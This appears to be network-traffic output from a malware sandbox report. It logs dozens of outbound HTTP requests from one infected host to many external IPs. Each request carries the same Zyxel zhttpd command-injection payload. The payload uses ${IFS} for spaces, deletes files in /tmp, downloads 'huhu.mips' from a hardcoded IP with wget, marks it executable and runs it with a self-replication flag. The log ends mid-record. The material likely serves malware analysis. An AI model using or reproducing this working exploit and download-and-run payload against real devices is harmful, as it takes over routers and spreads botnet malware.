                                              32192.168.2.144522032.252.235.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495381117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              33192.168.2.14537584.113.126.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495487928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              34192.168.2.1435882210.253.171.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495500088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              35192.168.2.1444680212.238.78.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495565891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              36192.168.2.145289424.87.3.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495588064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              37192.168.2.144194471.131.125.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495637894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              38192.168.2.143743634.102.2.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495697975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              39192.168.2.144749484.87.223.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495749950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              40192.168.2.1454704121.93.116.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495858908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              41192.168.2.1434186156.41.144.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495877028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              42192.168.2.1438116176.156.160.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495929956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              43192.168.2.1458146131.43.138.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495944023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              44192.168.2.145886034.85.24.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496016026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              45192.168.2.1444676161.98.26.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496056080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              46192.168.2.145140470.79.16.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496078968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              47192.168.2.143422843.177.86.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496107101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              48192.168.2.144728847.35.241.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496417999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              49192.168.2.144992252.129.152.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496452093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              50192.168.2.1434530134.153.120.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496524096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              51192.168.2.1443592141.66.51.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496542931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              52192.168.2.1452258206.235.63.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496598005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              53192.168.2.1460420160.166.135.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496649027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              54192.168.2.144264863.172.191.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496684074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              55192.168.2.1440036203.214.2.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496711969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              56192.168.2.1436902167.80.220.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496795893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              57192.168.2.1439410206.222.217.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496824980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              58192.168.2.1457586166.188.185.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496877909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              59192.168.2.1459076180.58.178.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.496938944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              60192.168.2.1452536153.144.192.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497045040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              61192.168.2.1434340138.166.40.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497106075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              62192.168.2.1439590157.145.139.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497149944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              63192.168.2.1446942153.80.139.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497219086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              64192.168.2.145943423.163.46.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497241020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              65192.168.2.1447760137.238.12.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497308969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              66192.168.2.1452390124.193.105.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497332096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              67192.168.2.1434874156.116.229.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497373104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              68192.168.2.1451290144.137.69.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497411966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              69192.168.2.143752642.158.12.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497481108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              70192.168.2.1445550141.96.240.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497509003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              71192.168.2.1447408170.32.244.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497545958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              72192.168.2.1438256170.162.231.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497564077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              73192.168.2.1448472197.34.38.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497586966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              74192.168.2.1439900184.159.246.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497922897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              75192.168.2.14444005.95.101.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497955084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              76192.168.2.1443466179.198.190.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497955084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              77192.168.2.145767832.88.133.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.497983932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              78192.168.2.1446154173.36.141.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498022079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              79192.168.2.1441698154.157.123.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498094082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              80192.168.2.143531848.113.112.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498122931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              81192.168.2.144107244.174.179.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498203993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              82192.168.2.1434416182.129.159.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498261929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              83192.168.2.1453716126.66.78.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498301029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              84192.168.2.1454920194.238.251.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498322010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              85192.168.2.1436918104.121.165.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498362064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              86192.168.2.1433342222.167.215.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498379946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              87192.168.2.1445094211.249.114.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498409986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              88192.168.2.1449384159.189.95.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498486996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              89192.168.2.1443414201.33.118.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498531103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              90192.168.2.145816680.6.19.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498570919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              91192.168.2.1457982146.49.127.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498647928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              92192.168.2.143286847.110.35.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498652935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              93192.168.2.145712241.30.148.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498692036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              94192.168.2.1436934174.230.230.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498747110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              95192.168.2.1440470220.129.228.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498790026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              96192.168.2.1446924136.92.250.159443
                                              TimestampBytes transferredDirectionData
